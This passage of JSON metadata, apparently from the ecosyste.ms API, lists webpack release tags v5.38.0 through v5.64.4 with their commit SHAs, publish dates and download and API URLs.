manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.